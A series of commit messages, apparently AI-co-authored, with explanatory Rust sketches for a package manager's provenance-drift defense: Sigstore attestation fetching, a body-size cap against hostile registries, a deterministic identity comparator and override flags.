reverse edge would cycle. `ProvenanceSnapshot` is pure schema
(4 primitive/Option fields, no methods) and fits naturally alongside
`TrustedDependencyBinding`, which is also pure schema. The one
existing caller (`lpm-cli/src/build_state.rs:37`) updated to import
from `lpm_workspace` instead of `lpm_security::triage`. The four
struct-behaviour tests moved with the struct; triage.rs keeps a
pointer comment to where the type now lives.
Test coverage (3943 workspace tests, all pass):
* `lpm-registry`: 5 new tests on DistInfo legacy + npm-shape
round-trip, empty `signatures` array vs absent-key distinction,
partial `RegistrySignature` payload tolerance, untyped
`AttestationRef.provenance` preserves unknown fields.
* `lpm-workspace`: 4 moved ProvenanceSnapshot tests (unchanged
behavioural contract); 3 new TrustedDependencyBinding tests —
pre-P4 shape round-trips without emitting `provenanceAtApproval:
null`, with-provenance round-trip preserves every field, absent-
provenance marker (`present: false`) preserved for the §7.2
"provenance dropped" branch.
Forward-compat: existing test-helper construction sites for
`TrustedDependencyBinding` across lpm-workspace / lpm-cli /
approve_builds.rs / build.rs / build_state.rs converted to
`..Default::default()` so future P4 fields don't break the tests.
CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
--no-fail-fast` — 3943 pass / 0 fail. The `lpm-task
perf_eval_*` family passed this run as well (machine was idle
enough); prior chunks exercised the `-j 1` carveout for those,
they remain the known load-sensitive pattern.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
… extraction
CLI-side module that fetches a Sigstore attestation bundle from a
registry's `DistInfo.attestations.url`, parses out the leaf cert,
and extracts the GitHub Actions OIDC identity into a
`ProvenanceSnapshot`. The install-time call site and the drift
comparator land in Chunk 3.
Module (`crates/lpm-cli/src/provenance_fetch.rs`, ~670 LOC incl.
tests):
* `fetch_provenance_snapshot(http, cache_root, name, version, attestation_ref)`
— public API returning `Result<Option<ProvenanceSnapshot>, LpmError>`.
Explicit three-valued return:
- `Ok(Some(snap))` — definitive answer (extracted identity OR
registry-confirmed absence).
- `Ok(None)` — degraded/unknown (network failure, malformed bundle).
NEVER cached, so the next install retries. The Chunk 3 drift rule
will interpret this as "pass, don't drift" per the plan's
offline-mode contract (§11 P4).
- `Err(_)` — reserved for genuinely fatal conditions (cache
directory unwritable).
* Cache primitives: SHA-256 of `name@version` as filename under
`~/.lpm/cache/metadata/attestations/`; 7-day TTL; corrupt + stale
+ schema-version-mismatched entries all treated as misses; atomic
write via `.tmp` + rename. Lives under the existing `metadata`
subtree per the user's Q3 answer — no new `lpm cache clean`
surface needed.
* Sigstore bundle parser: handles both the standard
`{verificationMaterial: {x509CertificateChain: ...}}` shape and
npm's `{attestations: [{bundle: ...}]}` list wrapper.
* Cert SAN extractor: walks the x509 SAN extension via
`x509-parser = "0.16"` (already in-workspace via `lpm-cert`),
matches the GitHub Actions OIDC URI pattern
`https://github.com/<org>/<repo>/.github/workflows/<workflow>@<ref>`,
emits `(publisher="github:<org>/<repo>", workflow="<path>@<ref>",
cert_sha256="sha256-<hex>")`. Non-GitHub SANs / missing
extensions / garbage bytes all return `None` cleanly.
* Defensive limits: 1 MiB max response body (hostile-registry
defense), 15 s fetch timeout (install-path budget).
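The URI-matching step of the SAN extractor can be sketched with plain string operations. Assumptions are loud here: the return shape is a `(publisher, workflow)` tuple rather than a `ProvenanceSnapshot`, the workflow value is taken to be the repo-relative path including `.github/workflows/`, and nested workflow paths are accepted. The real parser may differ on each point.

```rust
/// Parses a GitHub Actions OIDC SAN URI of the form
/// `https://github.com/<org>/<repo>/.github/workflows/<workflow>@<ref>`.
/// Returns (publisher, workflow) or None for anything that does not match.
pub fn parse_github_actions_uri(uri: &str) -> Option<(String, String)> {
    let rest = uri.strip_prefix("https://github.com/")?;

    // Split into org, repo, and the remainder of the path.
    let mut parts = rest.splitn(3, '/');
    let org = parts.next().filter(|s| !s.is_empty())?;
    let repo = parts.next().filter(|s| !s.is_empty())?;
    let workflow_and_ref = parts.next()?;

    // The remainder must begin with the workflows directory and carry a
    // non-empty file name and a non-empty ref after the first '@'.
    let file_and_ref = workflow_and_ref.strip_prefix(".github/workflows/")?;
    let (file, git_ref) = file_and_ref.split_once('@')?;
    if file.is_empty() || git_ref.is_empty() {
        return None;
    }

    Some((
        format!("github:{}/{}", org, repo),
        workflow_and_ref.to_string(),
    ))
}
```

Returning `None` for every mismatch keeps non-GitHub identities on the "present but no extractable identity" path instead of raising an error.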
Infrastructure:
* `lpm-common/src/paths.rs` gains `LpmRoot::cache_metadata_attestations()`
— single canonical accessor for the cache path, consumed by
Chunk 3 when it wires the install gate.
* `crates/lpm-cli/Cargo.toml`: `x509-parser = "0.16"` as regular
dep, `rcgen = { version = "0.13", features = ["pem"] }` as
dev-dep (synthetic cert generation for SAN-extractor tests).
Scaffolding: module-level `#![allow(dead_code)]` matching P3
Chunk 1's pattern — the binary doesn't call into the module yet so
clippy flags 17 items as unused. The allow comes off atomically in
Chunk 3 alongside the install-gate wiring.
Test coverage (28 unit tests, all pass):
* 7 `parse_github_actions_uri` tests — happy path, nested workflow
path, non-GitHub host rejection, missing workflows segment,
missing ref suffix, missing repo, extra path segment.
* 4 `extract_san_identity` tests — GitHub cert happy path, non-GitHub
SAN, cert with no SAN, garbage bytes. Certs generated at test time
via rcgen with deterministic URI SANs.
* 6 `parse_sigstore_bundle` tests — standard shape, npm list wrapper,
present-but-no-extractable-identity, malformed JSON, missing cert
chain, non-base64 rawBytes.
* 7 cache tests — write/read round-trip, miss, corrupt file, schema
version mismatch, stale past TTL, parent-dir creation,
filename-collision sanity.
* 4 public-API tests — absent-ref shortcut, absent-url shortcut,
cache-hit skips network (pointed at unreachable URL to prove
no connection attempted), network-failure returns `None` AND
does not cache (the critical "don't poison future installs for
7 days" contract).
CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
--no-fail-fast` — **3971/3971 pass**, including the full
`lpm-task filter::eval::tests::perf_eval_*` family (machine idle,
clean run).
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…ot post-buffer
Reviewer-flagged blocking defect: the 1 MiB "hostile registry" defense
documented in the Chunk 2 module was ineffective because
`fetch_and_parse` called `response.bytes().await` first (which buffers
the full body into memory) and only then compared `bytes.len()`
against `MAX_BUNDLE_BYTES`. A malicious or broken registry could
therefore still force an oversized allocation before the check ran —
the guard was cosmetic.
Fix: enforce the cap in two stages, so no matter how the body is
framed we never allocate past the cap.
1. **Stage 1 — pre-stream**: if the response declares a
`Content-Length` greater than `MAX_BUNDLE_BYTES`, reject immediately.
Dropping the response closes the connection without reading a body
byte. Cheap early-out for the common case where legitimate servers
declare truthful lengths.
2. **Stage 2 — mid-stream**: for chunked / undeclared-length
responses, stream chunks via `response.bytes_stream()` into a bounded
`Vec`, checking `buf.len() + chunk.len()` BEFORE copying. The moment a
chunk would push the accumulator past the cap, we return `Err(())` —
the stream drops, the connection closes, and `buf` stays under the
limit. A hostile 10 MiB body thus never materializes in our heap.
The worst-case allocation is now `MAX_BUNDLE_BYTES + chunk_size`,
where `chunk_size` is hyper's buffer size (typically 8-16 KiB) —
several orders of magnitude below the prior failure mode.
Tests (4 new, 32 total in the module):
* `fetch_and_parse_accepts_bundle_under_size_cap` — positive baseline
via wiremock. If this fails, the streaming plumbing itself is broken.
* `fetch_and_parse_rejects_oversized_body` — primary regression guard.
2 MiB body (truthful Content-Length) → Stage 1 rejects.
* `fetch_and_parse_rejects_declared_oversized_content_length` —
Stage 1 specificity. Declared Content-Length of `MAX_BUNDLE_BYTES+1`
with a tiny 16-byte real body → rejected on the header alone, no body
bytes consumed.
* `fetch_returns_none_on_oversized_body_and_does_not_cache` —
public-API flavor. Oversized body propagates through
`fetch_provenance_snapshot` as `Ok(None)` (degraded), AND the rejected
response is NOT written to cache (same poisoning contract as the
network-failure case).
Module docstring + the `fetch_and_parse` doc comment updated to
describe the two-stage enforcement explicitly, so future readers can
see the defense is real rather than inferred from the constant name.
CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
--no-fail-fast` — 3975/3975 pass, zero flakes (provenance_fetch tests
alone: 32/32).
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…w-TCP responder
Reviewer-flagged test-harness defect: the Stage-1 regression test
for "reject on declared oversized Content-Length"
(fetch_and_parse_rejects_declared_oversized_content_length) passed
while panicking a wiremock/hyper background thread. Root cause:
the earlier version declared a `Content-Length` of `MAX_BUNDLE_BYTES+1`
while `set_body_bytes(vec![0u8; 16])` emitted only 16 actual body
bytes. That mismatch violates HTTP/1.1 framing, so hyper's response
writer panicked with "payload claims content-length of 16, custom
content-length header claims 1048577". The test assertion still
returned ok because the client saw a transport error — which our
code maps to `Err(())` anyway — but the run left a background
panic in the test output. Passing for the wrong reason.
Fix: drop wiremock/hyper entirely for this specific test and serve
the HTTP response from a raw `tokio::net::TcpListener`. The
responder:
1. Binds to `127.0.0.1:0` (OS-assigned port).
2. Accepts exactly one connection (single-shot — task exits after
serving, no leak).
3. Reads the request preamble (so the turn-taking looks well-formed
on the wire).
4. Writes a valid HTTP/1.1 response header block:
`HTTP/1.1 200 OK`
`Content-Length: <MAX_BUNDLE_BYTES+1>`
`Content-Type: application/octet-stream`
`Connection: close`
5. Closes the connection without writing a single body byte.
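The five steps above can be sketched with the standard library. This swaps in a blocking `std::net::TcpListener` on a background thread where the commit uses `tokio::net::TcpListener`, and the function name is hypothetical; only the response headers and the single-shot, no-body behaviour are taken from the text.

```rust
use std::io::{Read, Write};
use std::net::{SocketAddr, TcpListener};
use std::thread;

/// Serves exactly one connection: reads the request head, writes a valid
/// header block declaring `declared_len`, then closes with no body bytes.
pub fn spawn_header_only_responder(
    declared_len: u64,
) -> std::io::Result<(SocketAddr, thread::JoinHandle<()>)> {
    // Port 0 asks the OS for a free port.
    let listener = TcpListener::bind("127.0.0.1:0")?;
    let addr = listener.local_addr()?;

    let handle = thread::spawn(move || {
        if let Ok((mut stream, _)) = listener.accept() {
            // Read the request preamble up to the blank line.
            let mut seen = Vec::new();
            let mut buf = [0u8; 1024];
            loop {
                match stream.read(&mut buf) {
                    Ok(0) | Err(_) => break,
                    Ok(n) => {
                        seen.extend_from_slice(&buf[..n]);
                        if seen.windows(4).any(|w| w == b"\r\n\r\n") {
                            break;
                        }
                    }
                }
            }
            let head = format!(
                "HTTP/1.1 200 OK\r\nContent-Length: {}\r\nContent-Type: application/octet-stream\r\nConnection: close\r\n\r\n",
                declared_len
            );
            let _ = stream.write_all(head.as_bytes());
            // `stream` is dropped here, closing the connection bodyless.
        }
    });

    Ok((addr, handle))
}
```

Because nothing in the responder validates the declared length against a payload, the header block is well-formed on its own and no server-side framing check can panic.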
Our client's Stage-1 check fires on the declared `Content-Length`
value alone (via `response.content_length()`) and returns `Err(())`
before calling `bytes_stream()`, so the "declared vs actual"
framing discrepancy never surfaces on the client side either —
reqwest never tries to read a body it didn't get. Zero framing
violations anywhere in the test harness, clean stderr under
`--nocapture`.
Verified with `cargo nextest run provenance_fetch --nocapture`:
32/32 in the module pass with no stray panic lines between test
stages. Full workspace gate still 3975/3975.
Production code unchanged — the two-stage body-cap enforcement from
5379ada is already correct; this commit fixes only the test harness
that exercises it.
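The two-stage cap referred to here can be sketched without an HTTP client. In this illustration the declared `Content-Length` and the body chunks are passed in directly, so `read_capped` is a hypothetical stand-in for the logic inside `fetch_and_parse`, which reads them from the response and its byte stream.

```rust
/// 1 MiB cap, matching the limit named in the commit text.
pub const MAX_BUNDLE_BYTES: usize = 1024 * 1024;

/// Accumulates body chunks without ever letting the buffer exceed `cap`.
/// `Err(())` mirrors the error shape mentioned in the commit message.
pub fn read_capped<I>(declared_len: Option<u64>, chunks: I, cap: usize) -> Result<Vec<u8>, ()>
where
    I: IntoIterator<Item = Vec<u8>>,
{
    // Stage 1: reject on the declared length alone, before touching the body.
    if let Some(len) = declared_len {
        if len > cap as u64 {
            return Err(());
        }
    }

    // Stage 2: check the would-be size BEFORE copying each chunk.
    let mut buf = Vec::new();
    for chunk in chunks {
        if buf.len() + chunk.len() > cap {
            return Err(());
        }
        buf.extend_from_slice(&chunk);
    }
    Ok(buf)
}
```

Stage 2 still matters when Stage 1 passes, because a chunked or undeclared-length response gives no header to reject on.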
CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean (via prior compile)
* `cargo nextest run --workspace --exclude lpm-integration-tests
--no-fail-fast` — 3975/3975 pass, zero flakes.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…te-path
Wires the Phase 46 P4 provenance-drift defense end-to-end. After this
commit the full §7.2 loop is live on the fresh-resolution install
path: install-time fetch → snapshot capture → comparator →
block-on-drift; approve-builds → write `provenance_at_approval`; next
install compares candidate version against that reference.
Comparator (lpm-security):
* New `lpm-security/src/provenance.rs` with `DriftVerdict` enum and
`check_provenance_drift(approved, now) -> DriftVerdict`. Pure
comparison — no I/O, no config. Maps the §7.2 five-branch table,
distinguishing outer `None` (degraded fetch / missing approval, pass)
from inner `present: false` (registry-confirmed absence, the axios
signal against an approved-present reference).
* 11 unit tests cover every match-table row plus a regression guard
that degraded-fetch (`now = None`) is distinct from confirmed-absent
(`now = Some(present: false)`) — the two look similar but have
opposite verdicts and the comparator must never conflate them.
Write-path (lpm-workspace + approve_builds):
* `TrustedDependencies::approve_with_provenance(name, version,
integrity, script_hash, provenance)` — new helper that persists
`provenance_at_approval` on the binding. The existing `approve(...)`
helper now delegates with `provenance_at_approval: None` so Legacy /
provenance-agnostic callers remain unchanged.
* `TrustedDependencies::provenance_reference_for_name(name)` —
returns `(approved_version, &binding)` for any rich entry whose
binding carries a non-None `provenance_at_approval`. Deliberate
Chunk-3 simplification: picks the first provenance-bearing entry
encountered, which is safe because filtering to provenance-bearing
approvals prevents a legacy axios@1.13.5 entry from masking an
axios@1.14.0 approval when checking axios@1.14.1.
* All three `approve-builds` call sites — the single-pkg direct
approve, the `--yes` bulk approve, and the interactive walk —
switched to `approve_with_provenance(...,
blocked.provenance_at_capture.clone())`. This closes the round-trip:
install-time snapshot → `BlockedPackage.provenance_at_capture` →
binding's `provenance_at_approval` → subsequent install's drift check.
Producer fix (build_state):
* `BlockedSetMetadataEntry` extended with `provenance_at_capture:
Option<ProvenanceSnapshot>`.
* `compute_blocked_packages_with_metadata` at build_state.rs:432 now
pulls the snapshot from metadata instead of hardcoding `None` — fixes
the reviewer-flagged producer-side underfill where non-drifting
packages had no approval-time reference. Every blocked package now
carries the capture regardless of whether its drift check fired.
Install-gate wiring (install.rs):
* New drift-gate block immediately after the P3 cooldown gate, gated
on `!used_lockfile` (fresh-resolution only; lockfile fast-path skips
by design — `lpm.lock` locks integrity, not attestation identity).
`--allow-new` does NOT bypass per D16.
* Short-circuits with zero network cost when the project has no rich
`trustedDependencies` entries with provenance (pre-P4 projects, or no
approvals at all).
* For each resolved package with a provenance-bearing prior approval:
extract `DistInfo.attestations` from the resolver's TTL cache, fetch
the candidate snapshot via Chunk 2's
`provenance_fetch::fetch_provenance_snapshot`, compare via the
lpm-security comparator, collect drift offenders.
* `§7.3` UX on block: per-package "@Version — <kind>" lines with
"last approved: v<VERSION> via <publisher> / <workflow>" and the
"axios 1.14.1 compromise (March 2026)" footer. Error message suggests
`lpm approve-builds` to acknowledge the new identity (Chunk 4 adds
`--ignore-provenance-drift` override flags).
* `build_blocked_set_metadata` at install.rs:2865 extended to also
fetch provenance per package — this is what populates
`BlockedSetMetadataEntry.provenance_at_capture` and closes the
approval-round-trip. Graceful degradation: if `LpmRoot::from_env()`
fails (HOME unset), the function's "never returns an error" contract
is preserved and `provenance_at_capture` is `None` for every package.
Chunk 2 scaffold removal:
* `#![allow(dead_code)]` on `provenance_fetch` module removed. The
install-gate call site + `build_blocked_set_metadata` both consume
the module's public API, so all 17 items are reachable from the
binary target and clippy is clean without the scaffold.
Test coverage (3986 workspace tests, all pass):
* 11 new `lpm-security::provenance::tests` covering the §7.2 match
table + degraded-vs-confirmed-absent regression guard.
* Existing `lpm-cli` `provenance_fetch` tests (32) + `lpm-workspace`
schema tests (9) still pass unchanged — the scaffold removal and the
helper additions are non-breaking.
* Forward-compat: the one `BlockedSetMetadataEntry` test-helper
construction site (build_state.rs:1519) uses `..Default::default()`
so future P4 fields don't force test re-edits.
CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
--no-fail-fast` — 3986/3986 pass, zero flakes (full `lpm-task
perf_eval_*` family clean).
Chunk 4 follows with override flags
(`--ignore-provenance-drift[-all]`) + global-install rejection;
Chunk 5 lands the E2E wiremock suite covering the §11 P4 ship
criteria.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…ference selector
Two reviewer-flagged defects in 917239c, both now corrected with
dedicated regression guards.
## Finding 1 (critical) — drift comparator flagged legitimate releases
The Chunk 3 comparator compared snapshots via full-struct `==`, which
treated the per-release ref (`refs/tags/v1.14.0` vs `v1.14.1`) and
the per-signing Fulcio leaf cert SHA as part of the identity tuple.
Every legitimate patch bump from the same repo + workflow would have
been classified `IdentityChanged` and hard-blocked.
Fix is a schema split + comparator rewrite:
* `ProvenanceSnapshot.workflow: Option<String>` → two fields:
  * `workflow_path: Option<String>` — `.github/workflows/publish.yml`.
  Stable across releases from the same workflow. Part of the
  drift-check identity tuple.
  * `workflow_ref: Option<String>` — `refs/tags/v1.14.0`. Varies per
  release. Retained for audit / UX ("last approved: v1.14.0 via <id>
  (ref: refs/tags/v1.14.0)") but NOT part of identity.
* `attestation_cert_sha256` similarly excluded from identity (Fulcio
rotates the leaf per signing). Retained for audit.
* `parse_github_actions_uri` now splits `<path>@<ref>` at the last
`@` and prepends `.github/workflows/` so `workflow_path` is the full
canonical path (matches §6.1 wire spec).
* `lpm-security::provenance::check_provenance_drift` gains an
internal `identity_equal(a, n)` helper that compares ONLY `(present,
publisher, workflow_path)`, replacing the full-struct `==` in the
"exact match" arm.
Regression guards (3 new, both layers):
* `provenance_fetch::tests::parse_uri_release_bump_changes_ref_but_not_path`
— v1.14.0 vs v1.14.1 URIs produce the SAME workflow_path and
DIFFERENT workflow_ref. Parser-level proof.
* `lpm_security::provenance::tests::no_drift_when_only_workflow_ref_differs_between_releases`
— the primary comparator regression guard. axios v1.14.0 vs v1.14.1
with different refs AND different cert SHAs → NoDrift.
* `lpm_security::provenance::tests::no_drift_when_only_cert_sha_differs_across_rotations`
— secondary guard: identical publisher + workflow_path +
workflow_ref but different cert SHA → NoDrift. Covers the case where
the same workflow re-signs (e.g., a republish) without a tag change.
Updated tests (schema broadening, not semantic change):
* `identity_changed_when_only_workflow_differs` renamed to
`identity_changed_when_workflow_path_differs` — same repo, same
release tag, DIFFERENT workflow file (e.g., a PR-triggered workflow
impersonating the main publish path). `workflow_path` IS part of the
identity tuple; this remains `IdentityChanged`.
* `identity_changed_when_only_cert_sha_differs` deleted — the old
assertion was the exact behavior we're fixing. The new
`no_drift_when_only_cert_sha_differs_across_rotations` test encodes
the correct post-fix behavior.
## Finding 2 (medium) — non-deterministic reference selector
`provenance_reference_for_name` used `map.iter().find_map(...)` over
a `HashMap`, whose iteration order isn't stable. Impact: the "last
approved: vX" UX line could show different versions across runs, and
when multiple provenance-bearing approvals for the same package name
carried DIFFERENT identities (legitimate publisher migration, or
prior attack + cleanup), the drift VERDICT itself could flip between
runs.
Fix: collect matching entries, pick the lexicographic-max version
string via `max_by(|(v1, _), (v2, _)| v1.cmp(v2))`. Deterministic;
approximates "latest semver" for consistent-digit-width components.
Documented simplification — a future phase can tighten to full
semver ordering, but Chunk 3's obligation is determinism first.
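A minimal sketch of the deterministic selector described in Finding 2, under stated assumptions: `Binding` is a hypothetical stand-in reduced to one field, the map is assumed to be keyed by `name@version` strings, and the return type is a guess at the shape the commit describes. Only the `max_by` expression is taken from the commit message.

```rust
use std::collections::HashMap;

/// Hypothetical, simplified binding: only the field the selector inspects.
#[derive(Debug, Clone, PartialEq)]
struct Binding {
    provenance_at_approval: Option<String>,
}

/// Returns `(approved_version, binding)` for `name`, choosing the
/// lexicographic-max version among provenance-bearing entries so the
/// result does not depend on HashMap iteration order.
fn provenance_reference_for_name<'a>(
    map: &'a HashMap<String, Binding>,
    name: &str,
) -> Option<(&'a str, &'a Binding)> {
    map.iter()
        .filter_map(|(key, binding)| {
            // Split at the LAST '@' so scoped names like `@scope/pkg@1.0.0`
            // keep their leading scope marker.
            let (pkg, version) = key.rsplit_once('@')?;
            (pkg == name && binding.provenance_at_approval.is_some())
                .then_some((version, binding))
        })
        .max_by(|(v1, _), (v2, _)| v1.cmp(v2))
}
```

String comparison ranks `1.9.0` above `1.10.0`, which is the "consistent-digit-width" caveat the commit documents; the sketch inherits it.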
7 new selector tests in `lpm-workspace`:
* `provenance_reference_returns_none_for_legacy_variant`
* `provenance_reference_returns_none_for_absent_name`
* `provenance_reference_returns_none_when_no_entries_have_provenance`
* `provenance_reference_returns_single_provenance_bearing_entry`
* `provenance_reference_filters_out_legacy_entries_in_mixed_map` —
safeguards the Finding-1-related behavior where a legacy binding
without provenance must NOT mask a newer provenance-bearing one.
* `provenance_reference_picks_lex_max_version_deterministically` —
primary regression guard. Constructs a 3-entry map with distinct
identities and runs the selector 8 times to exercise
HashMap-hash-state variability; must always pick `2.0.0`.
* `provenance_reference_handles_scoped_name_correctly` — scoped
package names like `@scope/pkg@1.0.0` must split at the LAST `@`, not
the leading scope `@`.
## Ancillary updates
* `ProvenanceSnapshot` now derives `Default` so construction sites
that only set `present` (e.g., `..Default::default()`) stay
forward-compat across future field additions.
* Schema tests in `lpm-workspace` renamed from
`provenance_snapshot_equality_is_tuple_strict` to
`provenance_snapshot_full_equality_is_tuple_strict` with a docstring
clarifying that full-struct equality is used for cache round-trip
verification, NOT the drift identity tuple. Prevents future confusion
between schema-level `==` and comparator-level `identity_equal`.
* `install.rs` drift-gate UX renders the identity as `<publisher> /
<workflow_path>` plus a trailing `(ref: <ref>)` hint so reviewers can
temporally place the approval without confusing the ref with
identity.
* `build_state.rs` + `lpm-cli/src/provenance_fetch.rs` construction
sites updated to the new field names.
CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
--no-fail-fast` — 3995/3995 pass, zero flakes. Focused provenance
suite: 61/61 (+9 from the two fix groups).
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
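For readers following the Finding 1 fix, here is a hedged sketch of a comparator that checks only the identity tuple. It is not the code from `lpm-security`: the `Option<&ProvenanceSnapshot>` parameter types, the `ProvenanceDropped` variant name, and the handling of an approved reference with `present: false` are all assumptions, since the commit message names only `NoDrift` and `IdentityChanged` and does not reproduce the full §7.2 table.

```rust
/// Simplified snapshot using the post-split field names from this commit.
#[derive(Debug, Clone, Default, PartialEq)]
struct ProvenanceSnapshot {
    present: bool,
    publisher: Option<String>,
    workflow_path: Option<String>,
    workflow_ref: Option<String>,            // audit only, not identity
    attestation_cert_sha256: Option<String>, // audit only, not identity
}

#[derive(Debug, PartialEq)]
enum DriftVerdict {
    NoDrift,
    ProvenanceDropped, // hypothetical name for the "provenance dropped" verdict
    IdentityChanged,
}

/// Compares ONLY `(present, publisher, workflow_path)`.
fn identity_equal(a: &ProvenanceSnapshot, n: &ProvenanceSnapshot) -> bool {
    (a.present, &a.publisher, &a.workflow_path)
        == (n.present, &n.publisher, &n.workflow_path)
}

fn check_provenance_drift(
    approved: Option<&ProvenanceSnapshot>,
    now: Option<&ProvenanceSnapshot>,
) -> DriftVerdict {
    match (approved, now) {
        // Outer None: missing approval or degraded fetch. Never a block.
        (None, _) | (_, None) => DriftVerdict::NoDrift,
        // Assumption: an approved-absent reference has nothing to drift from.
        (Some(a), Some(_)) if !a.present => DriftVerdict::NoDrift,
        // Approved-present, registry-confirmed absent now.
        (Some(_), Some(n)) if !n.present => DriftVerdict::ProvenanceDropped,
        (Some(a), Some(n)) if identity_equal(a, n) => DriftVerdict::NoDrift,
        (Some(_), Some(_)) => DriftVerdict::IdentityChanged,
    }
}
```

Keeping `workflow_ref` and `attestation_cert_sha256` on the struct but out of `identity_equal` is what lets a same-workflow patch bump compare as `NoDrift` while the derived `==` stays strict for cache round-trips.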
…s + -g rejection
Wires the Phase 46 P4 provenance-drift override flags end-to-end and
extends the P3 global-install-rejection pattern to cover them.
## CLI surface
Two new clap args on `Commands::Install` (see `main.rs:218-246`):
* `--ignore-provenance-drift <PKG>` — repeatable; opts out of the
drift check for one package name while keeping every other
package's drift check live.
* `--ignore-provenance-drift-all` — blanket opt-out for this
invocation.
Per Q2 of the P4 kickoff discussion, the two flags COMPOSE rather
than being mutually exclusive: `--ignore-provenance-drift-all`
supersedes the per-package list. No clap mutex — an orchestrator
forwarding both from higher-level config doesn't trip CI. The
precedence collapses inside `DriftIgnorePolicy::from_cli`.
## Canonical policy type
New `DriftIgnorePolicy` enum in `provenance_fetch.rs`:
```
pub enum DriftIgnorePolicy {
EnforceAll, // default: no override
IgnoreNames(HashSet<String>), // per-package opt-out
IgnoreAll, // blanket opt-out
}
```
* `Default` → `EnforceAll` (derive via `#[default]`), so every
non-Install caller (add/upgrade/migrate/run/dev/deploy/doctor/
install_global/update_global) defaults to enforcing drift by
passing `DriftIgnorePolicy::default()`.
* `.ignores_all()` — drift gate short-circuits the whole `if
!used_lockfile` block when true (zero network cost).
* `.ignores_name(&str)` — per-package consultation inside the gate.
Canonicalization tests:
* `drift_ignore_policy_no_flags_enforces_all` — baseline.
* `drift_ignore_policy_per_package_collapses_into_set` — happy path
for the repeatable flag.
* `drift_ignore_policy_all_flag_alone_ignores_all` — blanket path.
* `drift_ignore_policy_all_flag_supersedes_per_package_list` — Q2
regression guard: `-all` + `<pkg>` list → blanket, not error.
* `drift_ignore_policy_empty_inputs_canonicalize_to_enforce_all` —
avoids an empty-set `IgnoreNames` that would semantically match
`EnforceAll` but obscure the signal in debug output.
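The canonicalization rules those tests pin down can be sketched as follows. The enum matches the one shown above; the `from_cli(names, all)` signature is an assumption (the commit names the function but not its parameters), as is `ignores_name` returning `true` under `IgnoreAll`.

```rust
use std::collections::HashSet;

#[derive(Debug, Clone, Default, PartialEq)]
pub enum DriftIgnorePolicy {
    #[default]
    EnforceAll, // default: no override
    IgnoreNames(HashSet<String>), // per-package opt-out
    IgnoreAll, // blanket opt-out
}

impl DriftIgnorePolicy {
    /// Assumed signature: the repeatable flag's values plus the blanket flag.
    pub fn from_cli(names: &[String], all: bool) -> Self {
        if all {
            // The blanket flag supersedes any per-package list.
            Self::IgnoreAll
        } else if names.is_empty() {
            // Never build an empty IgnoreNames; it would mean EnforceAll.
            Self::EnforceAll
        } else {
            Self::IgnoreNames(names.iter().cloned().collect())
        }
    }

    pub fn ignores_all(&self) -> bool {
        matches!(self, Self::IgnoreAll)
    }

    pub fn ignores_name(&self, name: &str) -> bool {
        match self {
            Self::EnforceAll => false,
            Self::IgnoreNames(set) => set.contains(name),
            Self::IgnoreAll => true, // assumption: blanket implies every name
        }
    }
}
```

Collapsing precedence in one constructor means callers never have to reason about flag combinations; they only ever see one of three canonical states.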
## Install-gate wiring (install.rs:1718-1755)
The drift gate now consults the policy in two places:
1. **Short-circuit** before the trusted-dependencies read when
`.ignores_all()` is true. Emits a single advisory to stderr
("provenance-drift check waived by --ignore-provenance-drift-all")
so the opt-out is visible in the install log — silent skip
would hide that the user accepted a non-zero-risk identity.
2. **Per-package** inside the drift loop: before fetching the
candidate's attestation, check `.ignores_name(&p.name)` and emit
a per-package advisory ("X@Y — provenance-drift check waived by
--ignore-provenance-drift (approved reference: vZ)") before
`continue`-ing past the fetch. Skipping the fetch matters for
offline / intermittent-network installs where a waived package
wouldn't benefit from a pointless round-trip.
Footer UX extended to enumerate all three recovery paths in
narrowest-to-broadest order: re-approve via `lpm approve-builds`,
`--ignore-provenance-drift <pkg>`, `--ignore-provenance-drift-all`.
Error message's hint updated accordingly.
## Fan-out through the install pipeline
`run_with_options` / `run_add_packages` / `run_install_filtered_add`
all grow `drift_ignore_policy: DriftIgnorePolicy` at end of signature.
`run_install_filtered_add` clones the policy per targeted member in
the multi-member loop (cheap — enum + small HashSet) because each
iteration consumes the policy when calling into `run_with_options`.
Nine non-Install callers pass `DriftIgnorePolicy::default()` with
a one-line comment explaining why. Two test call sites for
`run_install_filtered_add` updated identically.
## Global-install rejection (main.rs:1576)
`validate_global_install_project_scoped_flags` gains two new
parameters mirroring the P3 `--min-release-age` rejection pattern:
```
ignore_provenance_drift: &[String],
ignore_provenance_drift_all: bool,
```
